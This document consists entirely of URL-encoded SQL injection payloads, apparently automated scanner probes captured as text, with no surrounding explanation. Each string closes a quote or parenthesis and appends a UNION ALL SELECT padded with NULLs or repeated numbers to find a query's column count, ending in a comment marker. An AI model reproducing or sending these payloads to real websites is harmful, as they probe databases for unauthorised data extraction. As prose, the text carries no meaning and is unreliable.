-6130%27%2B%28SELECT%20%27ARke%27%20WHERE%201187%3D1187%20UNION%20ALL%20SELECT%201187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%2C1187%23 -8478%27%2B%28SELECT%20%27EAjg%27%20WHERE%205066%3D5066%20UNION%20ALL%20SELECT%205066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%2C5066%23 -4858%27%2B%28SELECT%20%27nkTt%27%20WHERE%209005%3D9005%20UNION%20ALL%20SELECT%209005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%23 -3915%27%2B%28SELECT%20%27oslU%27%20WHERE%202656%3D2656%20UNION%20ALL%20SELECT%202656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%2C2656%23 -6622%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%23 -9438%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%23 -6053%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%2C7398%23 -6195%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%23 -9498%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%2C5476%23 -9967%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%2C7095%23 -9344%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%2C3041%23 -8032%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%2C6087%23 -8452%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%2C9004%23 -9541%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 